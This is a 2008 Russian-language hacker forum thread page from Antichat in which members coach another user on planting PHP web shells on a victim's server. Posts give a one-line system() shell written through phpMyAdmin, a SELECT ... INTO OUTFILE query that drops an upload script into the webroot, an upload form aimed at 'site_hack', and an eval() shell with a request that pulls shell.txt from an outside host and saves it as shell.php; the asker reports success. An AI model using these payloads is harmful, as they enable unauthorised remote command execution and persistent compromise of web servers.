ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Способы заливки файлов
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 31.07.2008, 19:40
UpsPig
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488

Репутация: 2
По умолчанию
n0ne
Если я правильно понял скрипт должен лежать на стороне жертвы.
Записать что то на черв можно только через shell.php <? system($_GET['cmd']); ?>, который я записал через phpmyadmin из-за того, что нельзя инклудить
 
Ответить с цитированием

  #12  
Старый 31.07.2008, 19:56
apollо
Новичок
Регистрация: 24.12.2006
Сообщений: 2
Провел на форуме:
18610

Репутация: 14
По умолчанию
Цитата:
Сообщение от UpsPig  
n0ne
Если я правильно понял скрипт должен лежать на стороне жертвы.
Записать что то на черв можно только через shell.php <? system($_GET['cmd']); ?>, который я записал через phpmyadmin из-за того, что нельзя инклудить
Если шел получил через phpmyadmin, то попробуй залить тогда так:

сначала сделай запрос в phpmyadmin:

SELECT '<? move_uploaded_file($userfile, "C:/путь_до_www/name_shell.php"); ?>' into OUTFILE "C:/путь_до_www/uploadshell.php"

///// думаю понятно, что создасться файл uploadshell.php в директории www, который впоследствии и зальёт нам шел под именем name_shell.php


Далее создай простую форму примерно следующего содержания:

PHP код:
<FORM ENCTYPE="multipart/form-data" ACTION="http://site_hack/uploadshell.php"     METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Агаотправить вот этот файлик: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM
подправь только ACTION и всё....

Желаю удачи
 
Ответить с цитированием

  #13  
Старый 31.07.2008, 20:42
UpsPig
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488

Репутация: 2
По умолчанию
apollо
Зашибись сработало ))
 
Ответить с цитированием

  #14  
Старый 01.08.2008, 04:00
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
попробуй через phpmyadmin всунуть вот это <?php eval($_GET[cmd]);?> в файл test.php
затем

test.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php

ой)ты уже и так справился!"
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор программ для очистки жёсткого диска v1ru$ Soft - Windows 21 17.01.2010 21:07
Народ.диск - скрипт заливки файлов. phenix1024 PHP, PERL, MySQL, JavaScript 4 05.07.2008 13:25
Доступ к компу в инете Dr.Saikov АнтиАдмин 13 25.06.2008 18:14
Perl: Скрипт для авторизиции и заливки файлов на сервер Fak1r PHP, PERL, MySQL, JavaScript 0 08.06.2008 01:38
Dos-команды юный хакер Windows 6 01.06.2008 11:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ